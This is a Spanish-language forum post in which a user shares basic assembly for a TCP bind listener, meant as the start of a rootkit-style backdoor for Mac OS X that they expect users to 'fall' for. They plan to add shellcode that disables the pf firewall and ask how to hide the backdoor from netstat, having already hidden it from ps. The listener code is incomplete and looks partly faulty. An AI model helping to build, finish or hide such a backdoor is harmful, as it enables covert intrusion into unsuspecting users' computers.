Gracias por contestar pensaba que nadie lo haría.
Bueno seguro que los usuarios de Mac OS X caen xD.
(Algo como lo segundo te interesaría en realidad, pero ahí ya hablamos de rootkit ... de una manera u otra necesitás ser root y los códigos son poco felices)
Hace dos dias que estoy con esto algo de esos códigos entiendo, puede que sea por que los dos somos poco felices

.
¿Hay alguna base por donde pueda empezar con los rootkit?
Sería genial ... se te puede corregir y enseñar mucho más si mostrás el código.
.section .data
.equ puerto, 10
sockaddr_in:
sin_len:
.byte 0
sin_family:
.byte 0
sin_port:
.word 0
sin_addr:
.long 0
sin_zero:
.byte 0,0,0,0,0,0,0,0
in_addr:
s_addr:
.long 0
sockdes:
.long 0
lonsock:
.long 0
.section .text
.globl _start
_start:
leaq sockaddr_in, %r8
movq $97, %rax
movq $2, %rdi
movq $1, %rsi
movq $6, %rdx
int $0x80
movq %rax, sockdes
movq $2, sin_family
movq $in_addr, sin_addr
movq $puerto, sin_port
movq $104, %rax
movq sockdes, %rdi
movq %r8, %rsi
movq $16, %rdx
int $0x80
pushq $1
pushq sockdes
movq $106, %rax
int $0x80
addq $8, %rsp
movq $30, %rax
movq sockdes, %rdi
movq %r8, %rsi
movq $lonsock, %rdx
int $0x80
xorq %rax, %rax
movq $1, %rax
int $0x80
No tiene ninguna función podría crear alguna con execve pero bueno, conecto con netcat.
Estoy pensando en meterle alguna shellcode, por ejemplo que desactive pf por que no me deja hacer nada xD, tambien que pueda cifrar la conexión o cosas así, a ver si puedo hacerlo.
Un saludo.
P.D: El código es muy básico, me diste una solución para ps, pero que pasa con netstat?